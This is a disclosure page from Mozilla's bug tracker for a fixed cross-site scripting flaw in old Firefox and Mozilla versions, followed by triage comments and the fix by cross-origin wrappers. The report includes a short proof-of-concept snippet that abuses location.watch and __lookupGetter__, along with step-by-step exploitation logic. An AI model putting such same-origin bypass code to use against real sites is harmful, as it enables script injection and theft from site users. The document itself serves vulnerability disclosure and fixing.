Closed
Bug 361961
Opened 18 years ago
Closed 17 years ago
XSS by using location.watch("href") and Object.prototype.__lookupGetter__ or __lookupSetter__
Categories
(Core :: DOM: Core & HTML, defect)
Tracking
()
RESOLVED
FIXED
mozilla1.9alpha8
People
(Reporter: moz_bug_r_a4, Assigned: mrbkap)
References
Details
(Whiteboard: [sg:high] fixed by XOW)
This XSS attack only works against certain sites that are using scripts that try to change a parent window's location.href. An attacker can run script with a target site's principal by using location.watch("href", ...) and Object.prototype.__lookup(G|S)etter__ method that came from an xbl compilation scope or a target site's global scope. <marquee id="m"> func = m.init.__lookupGetter__; or <iframe src="target site"> func = frames[0].location.__lookupGetter__; location.watch("href", func); location.__lookupGetter__("href").toString = function() { return "data:text/html,<script> ... </script>"; }; 1. A target site's script executes |top.location.href = foo|. 2. __lookupGetter__("href", undefined, foo) is called on the location object in top window, and it returns the location.href getter function. 3. The href getter function's toString() method is called and returns a data: url. 4. The data: url is loaded with the target site's principal. This affects the trunk, fx2.0.0.1, fx1.5.0.9, fx1.0.8 and moz1.7.13.
Reporter | ||
Comment 1•18 years ago
|
||
Reporter | ||
Comment 2•18 years ago
|
||
Comment 3•18 years ago
|
||
The "watch" part reminds me of bug 354978, but that one is fixed now and doesn't do anything to stop these testcases.
Assignee: dveditz → mrbkap
Whiteboard: [sg:high]
Updated•17 years ago
|
Flags: blocking1.9+
Comment 4•17 years ago
|
||
Targeting to B1 per conversation with Blake.
Target Milestone: --- → mozilla1.9beta1
Assignee | ||
Comment 5•17 years ago
|
||
Fixed by cross origin wrappers.
Updated•17 years ago
|
Flags: in-testsuite?
Updated•17 years ago
|
Flags: wanted1.8.1.x+
Flags: blocking1.8.1.7?
Whiteboard: [sg:high] → [sg:high] fixed by XOW
Updated•17 years ago
|
Flags: blocking1.8.1.8? → blocking1.8.1.9?
Updated•17 years ago
|
Flags: blocking1.8.1.12? → blocking1.8.1.13?
Updated•16 years ago
|
Flags: blocking1.8.1.13?
Updated•12 years ago
|
Group: core-security
Updated•5 years ago
|
Component: DOM → DOM: Core & HTML
You need to log in
before you can comment on or make changes to this bug.
Description
•